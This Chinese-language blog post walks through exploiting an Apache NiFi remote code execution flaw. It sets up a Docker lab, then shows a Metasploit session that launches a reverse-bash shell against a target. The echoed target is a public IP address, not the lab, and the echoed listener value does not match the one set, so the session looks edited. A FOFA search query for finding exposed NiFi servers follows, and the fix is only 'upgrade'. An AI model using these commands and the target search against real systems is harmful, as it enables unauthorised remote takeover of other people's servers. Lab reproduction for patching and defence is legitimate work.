Apache NiFi远程代码执行-RCE

目录

一. 漏洞简介

二. 影响版本

三. docker-compose进行漏洞环境搭建

四. 漏洞复现

五. 漏洞挖掘

六. 漏洞修复


一. 漏洞简介

       Apache NiFi 是一个易于使用、功能强大而且可靠的数据处理和分发系统。Apache NiFi 是为数据流设计。它支持高度可配置的指示图的数据路由、转换和系统中介逻辑。

二. 影响版本

Apache NiFi  <= 1.12.1

三. docker-compose进行漏洞环境搭建

测试环境版本:nifi:1.12.0

docker-compose.yml文件内容如下

version: '2'
services:
 struts2:
   image: apache/nifi:1.12.0
   ports:
    - "8080:8080"
    - "8000:8000"
    - "10000:10000"

执行docker-compose up -d 启动环境

访问8080,如下环境搭建成功

四. 漏洞复现

1. 用大神的脚本 https://github.com/freeFV/CVE-2020/blob/main/Apache%20NiFi%20Api%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(RCE).md

我这里是复现不了

2. 使用msf进行攻击

msf6 > use exploit/multi/http/apache_nifi_processor_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.60.7
lhost => 0.0.0.0
msf6 exploit(multi/http/apache_nifi_processor_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/apache_nifi_processor_rce) > set rhosts 目标ip
rhosts => 74.208.80.242
msf6 exploit(multi/http/apache_nifi_processor_rce) > set rport 目标端口
rport => 9090
msf6 exploit(multi/http/apache_nifi_processor_rce) > run 

执行run,开始攻击,获取shell。

五. 漏洞挖掘

fofa:"nifi" && title=="NiFi"

六. 漏洞修复

升级到最新版

猜你喜欢

转载自blog.csdn.net/qq_44159028/article/details/114636047